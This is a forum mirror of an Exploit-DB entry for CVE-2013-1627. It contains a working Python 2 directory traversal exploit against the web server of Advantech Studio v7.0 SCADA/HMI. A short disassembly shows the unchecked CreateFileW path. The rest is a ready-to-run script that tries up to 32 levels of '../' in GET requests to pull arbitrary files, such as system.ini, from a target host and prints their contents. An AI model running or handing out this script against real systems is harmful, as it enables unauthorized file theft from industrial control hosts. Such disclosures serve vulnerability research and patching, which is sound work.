- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23132
- Проверка EDB
-
- Пройдено
- Автор
- NIN3
- Тип уязвимости
- WEBAPPS
- Платформа
- WINDOWS
- CVE
- cve-2013-1627
- Дата публикации
- 2012-12-04
Код:
# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A
'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.
The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:
.text:00402A4A push 0 ; dwFlagsAndAttributes
.text:00402A4C push 3 ; dwCreationDisposition
.text:00402A4E push 3 ; dwShareMode
.text:00402A50 push 80000000h ; dwDesiredAccess
.text:00402A55 mov edx, [ebp+lpFileName]
.text:00402A58 push edx ; lpFileName
.text:00402A59 lea ecx, [ebp+var_1C]
.text:00402A5C call sub_401A90
sub_401A90 use CreateFileW function directly.
.text:00401A97 push 0 ; hTemplateFile
.text:00401A99 mov eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C push eax ; dwFlagsAndAttributes
.text:00401A9D mov ecx, [ebp+dwCreationDisposition]
.text:00401AA0 push ecx ; dwCreationDisposition
.text:00401AA1 push 0 ; lpSecurityAttributes
.text:00401AA3 mov edx, [ebp+dwShareMode]
.text:00401AA6 push edx ; dwShareMode
.text:00401AA7 mov eax, [ebp+dwDesiredAccess]
.text:00401AAA push eax ; dwDesiredAccess
.text:00401AAB mov ecx, [ebp+lpFileName]
.text:00401AAE push ecx ; lpFileName
.text:00401AAF call ds:CreateFileW
'''
import argparse
import httplib
MAX_NESTED_DIRECTORY = 32
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d')
parser.add_argument('-p')
parser.add_argument('-f')
args = parser.parse_args()
if args.d == None or args.p == None or args.f == None:
print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
return
httpConn = httplib.HTTPConnection(args.d, int(args.p))
for i in xrange(0, MAX_NESTED_DIRECTORY):
temp = MakePath(args.f, i)
httpConn.request('GET', temp)
resp = httpConn.getresponse()
content = resp.read()
if resp.status == 404:
print 'Not found ' + temp
else:
print 'Found ' + temp
print'------------------------------------------'
print content
print'---------------------------------------EOF'
break
def MakePath(f, count):
a = ""
for i in xrange(0, count):
a = a + "../"
return a + f
if __name__ == "__main__":
main()
- Источник
- www.exploit-db.com